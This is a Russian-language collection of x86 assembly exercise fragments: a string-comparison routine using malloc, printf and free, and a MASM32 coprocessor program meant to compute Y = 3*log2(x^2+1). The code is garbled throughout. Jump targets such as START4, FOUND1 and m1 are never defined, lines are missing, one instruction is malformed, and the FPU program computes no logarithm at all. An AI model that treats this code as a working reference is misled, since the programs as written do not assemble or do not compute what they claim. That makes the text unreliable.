call dword ptr malloc ; выделили память под результат
add esp,4 ; почистили стек
cmp eax,0 ; проверили выделение памяти
mov res,eax ; записали адрес результата

jmp RES
mov eax,ns
push eax
call dword ptr printf
add esp,4
mov eax,res
xor eax,eax
xchg res,eax


mov edx,str2 ; запомнили адрес первой строки, чтоб лишний раз не лазить в память
mov ebx,str1 ; запомнили адрес первой строки, чтоб лишний раз не лазить в память

// в еbx — адрес первой строки
// в edx — адрес второй строки
xor ecx,ecx
xor eax,eax
xor edi,edi

START3: ; внешний цикл

xor esi,esi ; esi — текущий индекс второй строки
mov cl,[ebx][eax] ; положили в cl первый символ первой строки
inc eax ; увеличили счетчик
cmp cl,0 ; проверка конца строки
je PRINT_RES ; ушли на выделение памяти под результат

mov ch,[edx][esi] ; положили в ch следующий символ
cmp ch,0 ; проверка конца строки
je END1 ; ушли в обнуление текущего счетчика

cmp cl,ch ; сравнили символы
je FOUND1 ; если символы совпали — говорим нашли
inc esi ; увеличили текущий счетчик
jmp START4

jmp START3 ; возвращаемся в главный цикл


xchg esi,res
//push esi
//mov esi,res
mov [esi+edi], cl ; на место res[edi] кладём совпавший символ
xchg esi,res
//pop esi
inc edi ; увеличили счетчик совпавших символов
jmp START3 ; ушли в главный цикл

//inc edi
//xor eax,eax
mov esi,res
xor cl,cl
mov [esi+edi],cl

push esi
call dword ptr printf
add esp,4

mov eax,str1
push eax
call dword ptr free
add esp,4
mov eax,str2
push eax
call dword ptr free
add esp,4
mov eax,res

cmp eax,0

push eax
call dword ptr free
add esp,4


mov eax,dys3
push eax
call dword ptr printf
add esp,4

call dword ptr getch ; смотрим, что нажали
cmp eax,27
cmp eax,13

mov eax,err
push eax
call dword ptr printf
add esp,4
mov eax,p
push eax
call dword ptr system
add esp,4


Ассемблер сопроцессор: Вычислить 4 значения функции: Y = 3 * log2(x2+1), x изменяется от 0,2 с шагом 0,3.

Вычислить 4 значения функции: Y = 3 * log2(x2+1), x изменяется от 0,2 с шагом 0,3.

3.1 Текст программы

.386 ; директива определения типа микропроцессора
.model flat,stdcall ; задание линейной модели памяти
option casemap:none ; отличие малых и больших букв
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\fpu.inc
include \masm32\include\user32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\fpu.lib

.data ; директива определения данные

_x dd 0.2 ; сохранение в 32-разрядном амбарчике памяти переменной х
_y dd 0 ; резервирование 32-х разрядов памяти для переменной в
tmp1 dd ? ; резервирование 32-х разрядов памяти для переменной tmp1
tmp2 dd ? ; резервирование 32-х разрядов памяти для переменной tmp2
hod dd 0.3
umnoj dd 3
const dd 4
mem dw ?
_MASK equ 0C00h
ifmt db «Y = %d»,0
st1 db «Вывод функции»,0
st2 dd 10 dup(?),0
st3 dd 10 dup(?),0

.code ; директива начала кода программы
_start: ; директива начала кода программы
lea edi,st2
lea esi,st3
xor eax,eax ; обнуление регистров
xor ebx,ebx
xor ecx,ecx
xor edx,edx
finit ; инициализания сопроцессора
fstcw mem
OR mem,_MASK
fldcw mem
mov ecx,4

fld _x
fld _x
fild umnoj
fld st(1)
fmulp st(2),st(0)
fld hod
fadd st(2),st(0)

fistp dword ptr [edi]
dec const
jz m2
fistp dword ptr [esi]
fld st(0)
mov eax[esi]
add edi,4
add esi,4
loop m1

invoke FpuFLtoA, 0, 10, ADDR st2, SRC1_FPU or SRC2_DIMM
invoke MessageBox, NULL, addr st2, addr st1, MB_OK
invoke ExitProcess, NULL ; возвращение управления ОС Windows
; но освобождение ресурсов

end _start ; директива окончания программы с именем start